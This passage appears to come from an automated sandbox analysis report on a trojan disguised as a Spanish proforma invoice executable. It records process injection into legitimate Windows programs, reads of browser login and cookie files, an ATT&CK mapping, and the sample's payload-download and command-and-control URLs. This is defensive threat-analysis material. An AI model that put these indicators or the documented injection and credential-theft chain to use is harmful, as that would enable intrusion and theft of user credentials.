              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740445 mov eax, dword ptr fs:[00000030h]2_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0443 mov eax, dword ptr fs:[00000030h]2_2_367B0443
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B420 mov eax, dword ptr fs:[00000030h]2_2_3672B420
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B9429 mov eax, dword ptr fs:[00000030h]2_2_367B9429
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36767425 mov eax, dword ptr fs:[00000030h]2_2_36767425
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36767425 mov ecx, dword ptr fs:[00000030h]2_2_36767425
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BF42F mov eax, dword ptr fs:[00000030h]2_2_367BF42F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF409 mov eax, dword ptr fs:[00000030h]2_2_367EF409
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C6400 mov eax, dword ptr fs:[00000030h]2_2_367C6400
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C6400 mov eax, dword ptr fs:[00000030h]2_2_367C6400
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672640D mov eax, dword ptr fs:[00000030h]2_2_3672640D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF4FD mov eax, dword ptr fs:[00000030h]2_2_367EF4FD
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367364F0 mov eax, dword ptr fs:[00000030h]2_2_367364F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A4F0 mov eax, dword ptr fs:[00000030h]2_2_3676A4F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A4F0 mov eax, dword ptr fs:[00000030h]2_2_3676A4F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367594FA mov eax, dword ptr fs:[00000030h]2_2_367594FA
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367654E0 mov eax, dword ptr fs:[00000030h]2_2_367654E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E4EF mov eax, dword ptr fs:[00000030h]2_2_3676E4EF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E4EF mov eax, dword ptr fs:[00000030h]2_2_3676E4EF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367544D1 mov eax, dword ptr fs:[00000030h]2_2_367544D1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367544D1 mov eax, dword ptr fs:[00000030h]2_2_367544D1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F4D0 mov eax, dword ptr fs:[00000030h]2_2_3675F4D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367514C9 mov eax, dword ptr fs:[00000030h]2_2_367514C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]2_2_3675A390
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]2_2_3675A390
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF38A mov eax, dword ptr fs:[00000030h]2_2_367EF38A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737072 mov eax, dword ptr fs:[00000030h]2_2_36737072
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36736074 mov eax, dword ptr fs:[00000030h]2_2_36736074
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36736074 mov eax, dword ptr fs:[00000030h]2_2_36736074
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367D9060 mov eax, dword ptr fs:[00000030h]2_2_367D9060
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731051 mov eax, dword ptr fs:[00000030h]2_2_36731051
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731051 mov eax, dword ptr fs:[00000030h]2_2_36731051
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760044 mov eax, dword ptr fs:[00000030h]2_2_36760044
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_368050B7 mov eax, dword ptr fs:[00000030h]2_2_368050B7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D02D mov eax, dword ptr fs:[00000030h]2_2_3672D02D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772010 mov ecx, dword ptr fs:[00000030h]2_2_36772010
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36755004 mov eax, dword ptr fs:[00000030h]2_2_36755004
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36755004 mov ecx, dword ptr fs:[00000030h]2_2_36755004
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738009 mov eax, dword ptr fs:[00000030h]2_2_36738009
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672C0F6 mov eax, dword ptr fs:[00000030h]2_2_3672C0F6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D0F0 mov eax, dword ptr fs:[00000030h]2_2_3676D0F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3676D0F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674B0D0 mov eax, dword ptr fs:[00000030h]2_2_3674B0D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B0D6 mov eax, dword ptr fs:[00000030h]2_2_3672B0D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EB0AF mov eax, dword ptr fs:[00000030h]2_2_367EB0AF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367700A5 mov eax, dword ptr fs:[00000030h]2_2_367700A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DF0A5 mov eax, dword ptr fs:[00000030h]2_2_367DF0A5

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FF8BB0B9E7F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQuerySystemInformation: Direct from: 0x6E95AD
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtSuspendThread: Indirect: 0x36443B29
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E24FA
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtResumeThread: Indirect: 0x36443E49
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6E9511
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtSetContextThread: Indirect: 0x36443809
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E253E
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FF8F0B42651
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E965C
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x491E716
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6EAB94
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtCreateThreadEx: Direct from: 0x6E0AD8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x4916B5F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtAllocateVirtualMemory: Direct from: 0x6ED3D9
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x4916919
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtClose: Indirect: 0x3643F632
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6E16D2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe NtQueueApcThread: Indirect: 0x3643F5A7
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x6E97A2
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtQueryInformationToken: Direct from: 0x6E1E40
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E24CB
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDeviceIoControlFile: Direct from: 0x6E9704
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x4916AE8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Section loaded: NULL target: C:\Windows\SysWOW64\rasphone.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
              Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\rasphone.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Thread register set: target process: 6480
              Source: C:\Windows\SysWOW64\rasphone.exe Thread register set: target process: 6480
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"
              Source: C:\Windows\SysWOW64\rasphone.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
              Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerI/g
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_0040351C

              Stealing of Sensitive Information

              Source: Yara match File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\rasphone.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\rasphone.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              Source: Yara match File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              11
              Masquerading
              1
              OS Credential Dumping
              121
              Security Software Discovery
              Remote Services1
              Email Collection
              1
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
              Process Injection
              2
              Virtualization/Sandbox Evasion
              LSASS Memory2
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Abuse Elevation Control Mechanism
              1
              Access Token Manipulation
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading
              312
              Process Injection
              NTDS2
              File and Directory Discovery
              Distributed Component Object Model1
              Clipboard Data
              3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets14
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Obfuscated Files or Information
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              [Behavior graph, ID: 1592061. Sample: FACTURA PROFORMA MATRICULAC..., Startdate: 15/01/2025, Architecture: WINDOWS, Score: 100. Process chain: FACTURA PROFORMA MATRICULACI#U00d3N.exe (started) -> FACTURA PROFORMA MATRICULACI#U00d3N.exe (started) -> RAVCpl64.exe (injected) -> rasphone.exe (started) -> firefox.exe (started)]

              Source | Detection | Scanner | Label | Link
              FACTURA PROFORMA MATRICULACI#U00d3N.exe | 21% | ReversingLabs | Win32.Trojan.Generic |
              FACTURA PROFORMA MATRICULACI#U00d3N.exe | 100% | Avira | HEUR/AGEN.1337950 |
              FACTURA PROFORMA MATRICULACI#U00d3N.exe | 25% | Virustotal | | Browse

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll | 0% | ReversingLabs | |

              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://212.162.149.165/psKGLMYRljeu25.bin | 0% | Avira URL Cloud | safe |
              http://212.162.149.165/psKGLMYRljeu25.binu | 0% | Avira URL Cloud | safe |
              http://212.162.149.165/psKGLMYRljeu25.binE | 0% | Avira URL Cloud | safe |
              http://www.flourishno.life/qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 | 0% | Avira URL Cloud | safe |
              http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe |
              http://212.162.149.165/psKGLMYRljeu25.bino | 0% | Avira URL Cloud | safe |
              http://212.162.149.165/psKGLMYRljeu25.bin9 | 0% | Avira URL Cloud | safe |
              http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe |
              http://212.162.149.165/Q | 0% | Avira URL Cloud | safe |
              http://212.162.149.165/ | 0% | Avira URL Cloud | safe |

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              www.flourishno.life | 67.223.117.189 | true | true | | unknown
              www.brunokito.cloud | unknown | unknown | false | | unknown
              www.fullhdfilmizlesene.uno | unknown | unknown | false | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://www.flourishno.life/qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 | true | Avira URL Cloud: safe | unknown
              http://212.162.149.165/psKGLMYRljeu25.bin | false | Avira URL Cloud: safe | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | high
              http://212.162.149.165/psKGLMYRljeu25.binE | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://212.162.149.165/psKGLMYRljeu25.bin9 | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://212.162.149.165/ | FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
